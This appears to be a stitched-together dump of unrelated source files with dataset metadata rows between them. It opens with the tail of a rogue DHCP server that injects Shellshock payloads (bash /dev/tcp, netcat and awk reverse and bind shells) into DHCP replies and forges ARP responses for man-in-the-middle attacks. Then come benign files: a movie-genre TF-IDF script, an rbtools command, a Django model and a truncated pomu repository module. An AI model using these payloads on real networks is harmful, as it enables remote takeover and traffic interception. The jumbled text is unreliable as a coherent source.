clients[client_mac_address].pop('client request his ip', None) clients[client_mac_address].pop('client request router ip', None) clients[client_mac_address].pop('client request dns ip', None) # endregion # region Get offer IP address try: offer_ip = clients[client_mac_address]["offer_ip"] except KeyError: pass # endregion # region This client already send DHCP DISCOVER and offer IP != requested IP if offer_ip is not None and offer_ip != requested_ip: # Print error message Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip, " not like offer IP: ", offer_ip) # Create and send DHCP nak packet nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address, offer_ip, requested_ip) SOCK.send(nak_packet) Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"mitm": "error: offer ip not like requested ip", "offer_ip": None}, client_already_in_dictionary) # print clients # endregion # region Offer IP == requested IP or this is a first request from this client else: # region Target IP address is set and requested IP != target IP if target_ip_address is not None and requested_ip != target_ip_address: # Print error message Base.print_error("Client: ", client_mac_address, " requested IP: ", requested_ip, " not like target IP: ", target_ip_address) # Create and send DHCP nak packet nak_packet = make_dhcp_nak_packet(transaction_id, client_mac_address, target_ip_address, requested_ip) SOCK.send(nak_packet) Base.print_info("DHCP NAK to: ", client_mac_address, " requested ip: ", requested_ip) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"mitm": "error: target ip not like requested ip", "offer_ip": None, "nak": True}, client_already_in_dictionary) # endregion # region Target IP address is set and requested IP == target IP or Target IP is not set else: # region Settings shellshock payload # region Create payload # Network settings command in target machine net_settings = args.ip_path + "ip addr add " + requested_ip + "/" + \ str(IPAddress(network_mask).netmask_bits()) + " dev " + args.iface_name + ";" # Shellshock payload: <user bash command> if args.shellshock_command is not None: payload = args.shellshock_command # Shellshock payload: # awk 'BEGIN{s="/inet/tcp/<bind_port>/0/0";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' & if args.bind_shell: payload = "awk 'BEGIN{s=\"/inet/tcp/" + str(args.bind_port) + \ "/0/0\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}' &" # Shellshock payload: # rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> <your_port> >/tmp/f & if args.nc_reverse_shell: payload = "rm /tmp/f 2>/dev/null;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + \ your_ip_address + " " + str(args.reverse_port) + " >/tmp/f &" # Shellshock payload: # /bin/nc -e /bin/sh <your_ip> <your_port> 2>&1 & if args.nce_reverse_shell: payload = "/bin/nc -e /bin/sh " + your_ip_address + " " + str(args.reverse_port) + " 2>&1 &" # Shellshock payload: # /bin/bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1 & if args.bash_reverse_shell: payload = "/bin/bash -i >& /dev/tcp/" + your_ip_address + \ "/" + str(args.reverse_port) + " 0>&1 &" if payload is not None: # Do not add network settings command in payload if not args.without_network: payload = net_settings + payload # Send payload to target in clear text if args.without_base64: shellshock_url = "() { :; }; " + payload # Send base64 encoded payload to target in clear text else: payload = b64encode(payload) shellshock_url = "() { :; }; /bin/sh <(/usr/bin/base64 -d <<< " + payload + ")" # endregion # region Check Shellshock payload length if shellshock_url is not None: if len(shellshock_url) > 255: Base.print_error("Length of shellshock payload is very big! Current length: ", str(len(shellshock_url)), " Maximum length: ", "254") shellshock_url = "A" # endregion # endregion # region Send DHCP ack and print info message if args.broadcast_response: ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip) else: ack_packet = make_dhcp_ack_packet(transaction_id, client_mac_address, requested_ip, client_mac_address, requested_ip) Base.print_info("DHCP ACK to: ", client_mac_address, " requested ip: ", requested_ip) SOCK.send(ack_packet) # endregion # region Add client info in global clients dictionary try: clients[client_mac_address].update({"mitm": "success"}) except KeyError: clients[client_mac_address] = {"mitm": "success"} # endregion # endregion # endregion # endregion # endregion # region DHCP DECLINE if request['DHCP'][53] == 4: # Get requested IP requested_ip = "0.0.0.0" if 50 in request['DHCP'].keys(): requested_ip = str(request['DHCP'][50]) # Print info message Base.print_info("DHCP DECLINE from: ", requested_ip + " (" + client_mac_address + ")", " transaction id: ", hex(transaction_id)) # If client IP in free IP addresses list delete this if requested_ip in free_ip_addresses: free_ip_addresses.remove(requested_ip) # Add client info in global clients dictionary add_client_info_in_dictionary(client_mac_address, {"decline_ip": requested_ip, "decline": True}, client_already_in_dictionary) # print clients # endregion # endregion DHCP # region ARP if 'ARP' in request.keys(): if request['Ethernet']['destination'] == "ff:ff:ff:ff:ff:ff" and \ request['ARP']['target-mac'] == "00:00:00:00:00:00": # region Set local variables arp_sender_mac_address = request['ARP']['sender-mac'] arp_sender_ip_address = request['ARP']['sender-ip'] arp_target_ip_address = request['ARP']['target-ip'] # endregion # region Print info message Base.print_info("ARP request from: ", arp_sender_mac_address, " \"", "Who has " + arp_target_ip_address + "? Tell " + arp_sender_ip_address, "\"") # endregion # region Get client mitm status try: mitm_status = clients[arp_sender_mac_address]["mitm"] except KeyError: mitm_status = "" # endregion # region Get client requested ip try: requested_ip = clients[arp_sender_mac_address]["requested_ip"] except KeyError: requested_ip = "" # endregion # region Create IPv4 address conflict if mitm_status.startswith("error"): arp_reply = arp.make_response(ethernet_src_mac=your_mac_address, ethernet_dst_mac=arp_sender_mac_address, sender_mac=your_mac_address, sender_ip=arp_target_ip_address, target_mac=arp_sender_mac_address, target_ip=arp_sender_ip_address) SOCK.send(arp_reply) Base.print_info("ARP response to: ", arp_sender_mac_address, " \"", arp_target_ip_address + " is at " + your_mac_address, "\" (IPv4 address conflict)") # endregion # region MITM success if mitm_status.startswith("success"): if arp_target_ip_address == requested_ip: clients[arp_sender_mac_address].update({"client request his ip": True}) if arp_target_ip_address == router_ip_address: clients[arp_sender_mac_address].update({"client request router ip": True}) if arp_target_ip_address == dns_server_ip_address: clients[arp_sender_mac_address].update({"client request dns ip": True}) try: test = clients[arp_sender_mac_address]["client request his ip"] test = clients[arp_sender_mac_address]["client request router ip"] test = clients[arp_sender_mac_address]["client request dns ip"] try: test = clients[arp_sender_mac_address]["success message"] except KeyError: if args.exit: sleep(3) Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")") exit(0) else: Base.print_success("MITM success: ", requested_ip + " (" + arp_sender_mac_address + ")") clients[arp_sender_mac_address].update({"success message": True}) except KeyError: pass # endregion # endregion # endregion # region Main function if __name__ == "__main__": # region Add ip addresses in list with free ip addresses from first to last offer IP if target_ip_address is None: Base.print_info("Create list with free IP addresses in your network ...") get_free_ip_addresses() # endregion # region Send DHCP discover packets in the background thread if args.send_discover: Base.print_info("Start DHCP discover packets send in the background thread ...") if args.discover_rand_mac: dhcp_discover_packets_source_mac = eth.get_random_mac() Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac, " (random MAC address)") else: dhcp_discover_packets_source_mac = your_mac_address Base.print_info("DHCP discover packets Ethernet source MAC: ", dhcp_discover_packets_source_mac, " (your MAC address)") Base.print_info("Delay between DHCP discover packets: ", str(args.discover_delay)) tm.add_task(discover_sender) # endregion # region Sniff network # region Create RAW socket for sniffing raw_socket = socket(AF_PACKET, SOCK_RAW, htons(0x0003)) # endregion # region Print info message Base.print_info("Waiting for a ARP or DHCP requests ...") # endregion # region Start sniffing while True: # region Try try: # region Sniff packets from RAW socket packets = raw_socket.recvfrom(2048) for packet in packets: # region Parse Ethernet header ethernet_header = packet[0:eth.header_length] ethernet_header_dict = eth.parse_header(ethernet_header) # endregion # region Could not parse Ethernet header - break if ethernet_header_dict is None: break # endregion # region Ethernet filter if target_mac_address is not None: if ethernet_header_dict['source'] != target_mac_address: break else: if ethernet_header_dict['source'] == your_mac_address: break if dhcp_discover_packets_source_mac is not None: if ethernet_header_dict['source'] == dhcp_discover_packets_source_mac: break # endregion # region ARP packet # 2054 - Type of ARP packet (0x0806) if ethernet_header_dict['type'] == arp.packet_type: # region Parse ARP packet arp_header = packet[eth.header_length:eth.header_length + arp.packet_length] arp_packet_dict = arp.parse_packet(arp_header) # endregion # region Could not parse ARP packet - break if arp_packet_dict is None: break # endregion # region ARP filter if arp_packet_dict['opcode'] != 1: break # endregion # region Call function with full ARP packet reply({ 'Ethernet': ethernet_header_dict, 'ARP': arp_packet_dict }) # endregion # endregion # region IP packet # 2048 - Type of IP packet (0x0800) if ethernet_header_dict['type'] == ip.header_type: # region Parse IP header ip_header = packet[eth.header_length:] ip_header_dict = ip.parse_header(ip_header) # endregion # region Could not parse IP header - break if ip_header_dict is None: break # endregion # region UDP if ip_header_dict['protocol'] == udp.header_type: # region Parse UDP header udp_header_offset = eth.header_length + (ip_header_dict['length'] * 4) udp_header = packet[udp_header_offset:udp_header_offset + udp.header_length] udp_header_dict = udp.parse_header(udp_header) # endregion # region Could not parse UDP header - break if udp_header is None: break # endregion # region DHCP packet if udp_header_dict['destination-port'] == 67 and udp_header_dict['source-port'] == 68: # region Parse DHCP packet dhcp_packet_offset = udp_header_offset + udp.header_length dhcp_packet = packet[dhcp_packet_offset:] dhcp_packet_dict = dhcp.parse_packet(dhcp_packet) # endregion # region Could not parse DHCP packet - break if dhcp_packet_dict is None: break # endregion # region Call function with full DHCP packet full_dhcp_packet = { 'Ethernet': ethernet_header_dict, 'IP': ip_header_dict, 'UDP': udp_header_dict } full_dhcp_packet.update(dhcp_packet_dict) reply(full_dhcp_packet) # endregion # endregion # endregion # endregion # endregion # endregion # region Exception - KeyboardInterrupt except KeyboardInterrupt: Base.print_info("Exit") exit(0) # endregion # endregion # endregion # endregion
unlicense
2,859,265,539,066,611,700
41.478261
131
0.544649
false
4.269039
false
false
false
jadhavhninad/-CSE_515_MWD_Analytics-
Phase 1/Project Code/phase1_code/differentiate_genre.py
1
17298
from mysqlConn import DbConnect import argparse import operator from math import log,fabs import pprint #DB connector and curosor db = DbConnect() db_conn = db.get_connection() cur2 = db_conn.cursor(); #Argument parser parser = argparse.ArgumentParser() parser.add_argument("GENRE1") parser.add_argument("GENRE2") parser.add_argument("MODEL") args = parser.parse_args() ########################################## #General computation ######################################### #1. Getting total number of movies in genre1 U genre2 cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2]) result0 = cur2.fetchone() total_movie_count = float(result0[0]) if args.MODEL== "TF-IDF-DIFF": ############################### #MODEL = TF_IDF_DIFF ############################### #=============================================================================================== #Subtask-1 : Calculate the weighted unique movies count returned by a tag for set of movies in genre1 U genre2 #=============================================================================================== cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2]) result0 = cur2.fetchone() total_movie_count = result0[0] #Since we already have the TF value and it's data, we now generate the required data for idf. #IDF here will be considered as the number of movie-genre that belong to a certain tag. So the idf calculation will be # Total movie-genres / sum of weight of movie-genre with a particular tag #Calculate the total weighted count for movie-genre count for each tag. #weighted count for an occurance of a tag = tag_newness weighted_genre_movie_count={} cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2]) result1 = cur2.fetchall() for data1 in result1: #print data1 genre_movie_id = data1[0] genre_tag_id="" #Select distint tagIDs for the movieID cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] genre_tag_newness = data2[1] #Get the tag_name for the tagID. For each tag weight, add the rank_weight as well. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] tagWeight = round((float(genre_tag_newness)),10) if tagName in weighted_genre_movie_count: weighted_genre_movie_count[tagName] = round((weighted_genre_movie_count[tagName] + tagWeight), 10) else: weighted_genre_movie_count[tagName] = tagWeight # =============================================================================== #Subtask-2: Get the TF , IDF and TF-IDF for the genres #=============================================================================== data_dictionary_tf_genre1 = {} data_dictionary_tf_idf_genre1 = {} total_tag_newness_weight = 0 #Get all movies of genre 1. cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] genre_tag_newness = data2[1] #Get the tag_name for the tagID. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] tagWeight = round(float(genre_tag_newness),10) total_tag_newness_weight = total_tag_newness_weight + tagWeight #For TF if tagName in data_dictionary_tf_genre1: data_dictionary_tf_genre1[tagName] = round((data_dictionary_tf_genre1[tagName] + tagWeight),10) else: data_dictionary_tf_genre1[tagName] = tagWeight # Make weight of other tags to zero. Calculate the tf, idf and tf-idf values for the tags that exist. cur2.execute("SELECT tag FROM `genome-tags`") tagName = cur2.fetchall() for keyVal in tagName: key = keyVal[0] if key in data_dictionary_tf_genre1: data_dictionary_tf_genre1[key] = round((float(data_dictionary_tf_genre1[key]) / float(total_tag_newness_weight)),10) data_dictionary_tf_idf_genre1[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10) data_dictionary_tf_idf_genre1[key] = round((data_dictionary_tf_genre1[key] * data_dictionary_tf_idf_genre1[key]), 10) else: data_dictionary_tf_genre1[key] = 0.0 #genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True) #genre_model_value_tfidf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True) #Get all movies of a specific genre 2. #-------------------------------------- data_dictionary_tf_genre2 = {} data_dictionary_tf_idf_genre2 = {} total_tag_newness_weight = 0 cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] genre_tag_newness = data2[1] #Get the tag_name for the tagID. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] tagWeight = round(float(genre_tag_newness),10) total_tag_newness_weight = total_tag_newness_weight + tagWeight #For TF if tagName in data_dictionary_tf_genre2: data_dictionary_tf_genre2[tagName] = round((data_dictionary_tf_genre2[tagName] + tagWeight),10) else: data_dictionary_tf_genre2[tagName] = tagWeight # Make weight of other tags to zero. cur2.execute("SELECT tag FROM `genome-tags`") tagName = cur2.fetchall() for keyVal in tagName: key=keyVal[0] if key in data_dictionary_tf_genre2: data_dictionary_tf_genre2[key] = round((float(data_dictionary_tf_genre2[key]) / float(total_tag_newness_weight)),10) data_dictionary_tf_idf_genre2[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10) data_dictionary_tf_idf_genre2[key] = round((data_dictionary_tf_genre2[key] * data_dictionary_tf_idf_genre2[key]), 10) else: data_dictionary_tf_genre2[key] = 0.0 #genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True) #genre_model_value_tfidf_genre2 = sorted(data_dictionary_tf_genre2.items(), key=operator.itemgetter(1), reverse=True) #-------------------------------------------------------------------------------------------------------------- #Subtask-3 : Calculate the DIFF vector #Manhattan distance is used since for high dimensions it works better. compared to higher order minkowski distance diff_vector={} #Makes more sense to have +ve 0, and -ve as it clearly states the difference, between genre1 #and genre2. for key in data_dictionary_tf_idf_genre1: if key in data_dictionary_tf_idf_genre2: diff_vector[key] = data_dictionary_tf_idf_genre1[key] - data_dictionary_tf_idf_genre2[key] else: diff_vector[key] = data_dictionary_tf_idf_genre1[key] for key in data_dictionary_tf_idf_genre2: if key in diff_vector: continue else: diff_vector[key] = 0 - data_dictionary_tf_idf_genre2[key] cur2.execute("SELECT tag FROM `genome-tags`") tagName = cur2.fetchall() for keyVal in tagName: key = keyVal[0] if key in diff_vector: continue; else: diff_vector[key] = 0.0 genre_diff = sorted(diff_vector.items(), key=operator.itemgetter(1), reverse=True) #pprint.pprint(genre_model_value_tfidf_genre1) #pprint.pprint(genre_model_value_tfidf_genre2) pprint.pprint(genre_diff) elif args.MODEL == "P-DIFF1" : ############################### #MODEL = P-DIFF-1 ############################### # =============================================================================== #Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2 #and total movies in genre1 #================================================================================ dd_r1_genre1 = {} dd_m1_genre2 = {} M = total_movie_count #Movies in genre1 U genre2 cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE1]) result1 = cur2.fetchone() R = float(result1[0]) #Movies in genre1 #Calculation for genre1. r = movies in genre1 with tag t cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] #Get the tag_name for the tagID. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] #For TF if tagName in dd_r1_genre1: dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1) else: dd_r1_genre1[tagName] = 1 #Calculation for m=movies in genre1 U genre 2 with tag t cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] #Get the tag_name for the tagID. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] #For TF if tagName in dd_m1_genre2: dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1) else: dd_m1_genre2[tagName] = 1 #print dd_r1_genre1 #print dd_m1_genre2 #Subtask:2 - Calculate the pdiff1 using the given formula pdiff_wt_genre1={} for tag in dd_m1_genre2: r=0 if tag in dd_r1_genre1: r = float(dd_r1_genre1[tag]) m = float(dd_m1_genre2[tag]) val1=0 val2=0 val3=0 val4=0 #r = 0 means that the tag never occurs for a genre. #R=r means that the tag occurs for every movie of the genre, so its frequency is 1 and #discriminating power is 0 . In both the scenarios, we ignore such a tag. #m>= r always since its a union. # Get the probability of the tag in M and add it to avoid edge cases- ref:Salton & buckley p_tag = float(m / M) #explain why you think square term comes in the picture.But as the max probability will be 1, the term does not make #much difference for values less than 1. val1 = float(float(r + p_tag)/(R-r+1)) val3 = float(float(r + p_tag)/(R + 1)) val2 = float((m-r+p_tag)/(M-m-R+r+1)) val4 = float((m-r+p_tag)/(M-R+1)) pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * float(val3 - val4) #Make weight of other tags to zero cur2.execute("SELECT tag FROM `genome-tags`") tagName = cur2.fetchall() for keyval in tagName: key = keyval[0] if key in pdiff_wt_genre1: continue else: pdiff_wt_genre1[key] = 0 pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True)) elif args.MODEL == "P-DIFF2": ############################### #MODEL = P-DIFF-2 ############################### # =============================================================================== #Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2 #and total movies in genre2 #================================================================================ dd_r1_genre1 = {} dd_m1_genre2 = {} M = total_movie_count #Movies in genre1 U genre2 cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE2]) result1 = cur2.fetchone() R = float(result1[0]) #Movies in genre1 #Calculation for genre2. r = movies in genre2 without tag t. We first get the value of movies in genre2 with tag t then #subtract that value from total movies there in genre2, for each tag cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] #Get the tag_name for the tagID. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] #For TF if tagName in dd_r1_genre1: dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1) else: dd_r1_genre1[tagName] = 1 #Calculation for genre2. m=movies in genre1 U genre 2 without tag t. Subtract later from M to get movies in genre1 or genre2 #without a tag cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2]) result1 = cur2.fetchall() for data1 in result1: genre_movie_id = data1[0] #Select distint tagIDs for the movieID cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id]) result2 = cur2.fetchall() for data2 in result2: genre_tag_id = data2[0] #Get the tag_name for the tagID. cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id]) result2_sub = cur2.fetchone() tagName = result2_sub[0] #For TF if tagName in dd_m1_genre2: dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1) else: dd_m1_genre2[tagName] = 1 #Subtask:2 - Calculate the pdiff1 using the given formula pdiff_wt_genre1={} for tag in dd_m1_genre2: r = R if tag in dd_r1_genre1: r = R - float(dd_r1_genre1[tag]) m = M - float(dd_m1_genre2[tag]) val1=0 val2=0 val3=0 val4=0 #r = 0 means that the tag never occurs for a genre. #R=r means that the tag occurs for every movie of the genre, so its frequency is 1 and #discriminating power is 0 . In both the scenarios, we ignore such a tag. #m>= r always since its a union. # Get the probability of the tag not in M and add it to avoid edge cases- ref:Salton & buckley p_tag = float(m / M) #explain why you think square term comes in the picture.But as the max probability will be 1, the term does not make #much difference for values less than 1. val1 = float(float(r + p_tag)/(R-r+1)) val3 = float(float(r + p_tag)/(R + 1)) val2 = float((m-r+p_tag)/(M-m-R+r+1)) val4 = float((m-r+p_tag)/(M-R+1)) pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * (float(val3 - val4)) #Make weight of other tags to zero cur2.execute("SELECT tag FROM `genome-tags`") tagName = cur2.fetchall() for keyval in tagName: key = keyval[0] if key in pdiff_wt_genre1: continue else: pdiff_wt_genre1[key] = 0 pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True))
gpl-3.0
3,274,444,029,248,706,600
33.875
133
0.578737
false
3.541044
false
false
false
brettdh/rbtools
rbtools/commands/status.py
1
2506
import logging from rbtools.commands import Command, Option from rbtools.utils.repository import get_repository_id from rbtools.utils.users import get_username class Status(Command): """Display review requests for the current repository.""" name = "status" author = "The Review Board Project" description = "Output a list of your pending review requests." args = "" option_list = [ Option("--all", dest="all_repositories", action="store_true", default=False, help="Show review requests for all repositories instead " "of the detected repository."), Command.server_options, Command.repository_options, Command.perforce_options, ] def output_request(self, request): print " r/%s - %s" % (request.id, request.summary) def output_draft(self, request, draft): print " * r/%s - %s" % (request.id, draft.summary) def main(self): repository_info, tool = self.initialize_scm_tool( client_name=self.options.repository_type) server_url = self.get_server_url(repository_info, tool) api_client, api_root = self.get_api(server_url) self.setup_tool(tool, api_root=api_root) username = get_username(api_client, api_root, auth_required=True) query_args = { 'from_user': username, 'status': 'pending', 'expand': 'draft', } if not self.options.all_repositories: repo_id = get_repository_id( repository_info, api_root, repository_name=self.options.repository_name) if repo_id: query_args['repository'] = repo_id else: logging.warning('The repository detected in the current ' 'directory was not found on\n' 'the Review Board server. Displaying review ' 'requests from all repositories.') requests = api_root.get_review_requests(**query_args) try: while True: for request in requests: if request.draft: self.output_draft(request, request.draft[0]) else: self.output_request(request) requests = requests.get_next(**query_args) except StopIteration: pass
mit
7,896,034,050,389,022,000
33.805556
77
0.553472
false
4.523466
false
false
false
mennanov/django-blueprint
project_name/apps/navigation/models.py
1
1661
# -*- coding: utf-8 -*- from django.db import models from django.utils.translation import ugettext_lazy as _ from mptt.models import TreeForeignKey, TreeManyToManyField, MPTTModel class Navigation(models.Model): """ Navigation menu """ key = models.CharField(_(u'key'), max_length=32, help_text=_(u'This value is used in the code, do not touch it!')) name = models.CharField(_(u'name'), max_length=70) links = TreeManyToManyField('Link', verbose_name=_(u'links'), through='LinkMembership') def __unicode__(self): return self.name class Meta: verbose_name = _(u'navigation menu') verbose_name_plural = _(u'navigation menus') class Link(MPTTModel): """ Navigation link """ parent = TreeForeignKey('self', verbose_name=_(u'parent link'), null=True, blank=True) name = models.CharField(_(u'name'), max_length=70, help_text=_(u'Name of the link in the menu')) url = models.CharField(_(u'url'), max_length=255, help_text=_(u'Example: "/about/" or "/"')) def __unicode__(self): return self.name def get_absolute_url(self): return self.url class Meta: verbose_name = _(u'navigation link') verbose_name_plural = _(u'navigation links') class LinkMembership(models.Model): """ Link in navigation membership """ navigation = models.ForeignKey('Navigation') link = TreeForeignKey('Link') position = models.PositiveIntegerField(_(u'position'), default=0, db_index=True) class Meta: ordering = ['position'] verbose_name = _(u'link membership') verbose_name_plural = _(u'link memberships')
gpl-2.0
-8,933,735,953,260,462,000
30.358491
118
0.64118
false
3.862791
false
false
false
Hummer12007/pomu
pomu/repo/repo.py
1
9456
"""Subroutines with repositories""" from os import path, rmdir, makedirs from shutil import copy2 from git import Repo from patch import PatchSet import portage from pomu.package import Package, PatchList from pomu.util.cache import cached from pomu.util.fs import remove_file, strip_prefix from pomu.util.result import Result class Repository(): def __init__(self, root, name=None): """ Parameters: root - root of the repository name - name of the repository """ if not pomu_status(root): raise ValueError('This path is not a valid pomu repository') self.root = root self.name = name @property def repo(self): return Repo(self.root) @property def pomu_dir(self): return path.join(self.root, 'metadata/pomu') def merge(self, mergeable): """Merges a package or a patchset into the repository""" if isinstance(mergeable, Package): return self.merge_pkg(mergeable) elif isinstance(mergeable, PatchList): pkg = self.get_package(mergeable.name, mergeable.category, mergeable.slot).unwrap() return pkg.patch(mergeable.patches) return Result.Err() #unreachable yet def merge_pkg(self, package): """Merge a package (a pomu.package.Package package) into the repository""" r = self.repo pkgdir = path.join(self.pomu_dir, package.category, package.name) if package.slot != '0': pkgdir = path.join(pkgdir, package.slot) package.merge_into(self.root).expect('Failed to merge package') for wd, f in package.files: r.index.add([path.join(wd, f)]) manifests = package.gen_manifests(self.root).expect() for m in manifests: r.index.add([m]) self.write_meta(pkgdir, package, manifests) with open(path.join(self.pomu_dir, 'world'), 'a+') as f: f.write('{}/{}'.format(package.category, package.name)) f.write('\n' if package.slot == '0' else ':{}\n'.format(package.slot)) r.index.add([path.join(self.pomu_dir, package.category, package.name)]) r.index.add([path.join(self.pomu_dir, 'world')]) r.index.commit('Merged package ' + package.name) return Result.Ok('Merged package ' + package.name + ' successfully') def write_meta(self, pkgdir, package, manifests): """ Write metadata for a Package object Parameters: pkgdir - destination directory package - the package object manifests - list of generated manifest files """ makedirs(pkgdir, exist_ok=True) with open(path.join(pkgdir, 'FILES'), 'w+') as f: for wd, fil in package.files: f.write('{}/{}\n'.format(wd, fil)) for m in manifests: f.write('{}\n'.format(strip_prefix(m, self.root))) if package.patches: patch_dir = path.join(pkgdir, 'patches') makedirs(patch_dir, exist_ok=True) with open(path.join(pkgdir, 'PATCH_ORDER'), 'w') as f: for patch in package.patches: copy2(patch, patch_dir) f.write(path.basename(patch) + '\n') if package.backend: with open(path.join(pkgdir, 'BACKEND'), 'w+') as f: f.write('{}\n'.format(package.backend.__cname__)) package.backend.write_meta(pkgdir) with open(path.join(pkgdir, 'VERSION'), 'w+') as f: f.write(package.version) def unmerge(self, package): """Remove a package (by contents) from the repository""" r = self.repo for wd, f in package.files: dst = path.join(self.root, wd) remove_file(r, path.join(dst, f)) try: rmdir(dst) except OSError: pass pf = path.join(self.pomu_dir, package.name) if path.isfile(pf): remove_file(r, pf) r.commit('Removed package ' + package.name + ' successfully') return Result.Ok('Removed package ' + package.name + ' successfully') def remove_package(self, name): """Remove a package (by name) from the repository""" pkg = self.get_package(name).expect() return self.unmerge(pkg) def update_package(self, category, name, new): """Updates a package, replacing it by a newer version""" pkg = self.get_package(category, name).expect() self.unmerge(pkg).expect() self.merge(new) def _get_package(self, category, name, slot='0'): """Get an existing package (by category, name and slot), reading the manifest""" from pomu.source import dispatcher if slot == '0': pkgdir = path.join(self.pomu_dir, category, name) else: pkgdir = path.join(self.pomu_dir, category, name, slot) backend = None if path.exists(path.join(pkgdir, 'BACKEND')): with open(path.join(pkgdir, 'BACKEND'), 'r') as f: bname = f.readline().strip() backend = dispatcher.backends[bname].from_meta_dir(pkgdir) if backend.is_err(): return backend backend = backend.ok() with open(path.join(pkgdir, 'VERSION'), 'r') as f: version = f.readline().strip() with open(path.join(pkgdir, 'FILES'), 'r') as f: files = [x.strip() for x in f] patches=[] if path.isfile(path.join(pkgdir, 'PATCH_ORDER')): with open(path.join(pkgdir, 'PATCH_ORDER'), 'r') as f: patches = [x.strip() for x in f] pkg = Package(name, self.root, backend, category=category, version=version, slot=slot, files=files, patches=[path.join(pkgdir, 'patches', x) for x in patches]) pkg.__class__ = MergedPackage return Result.Ok(pkg) def get_package(self, name, category=None, slot=None): """Get a package by name, category and slot""" with open(path.join(self.pomu_dir, 'world'), 'r') as f: for spec in f: spec = spec.strip() cat, _, nam = spec.partition('/') nam, _, slo = nam.partition(':') if (not category or category == cat) and nam == 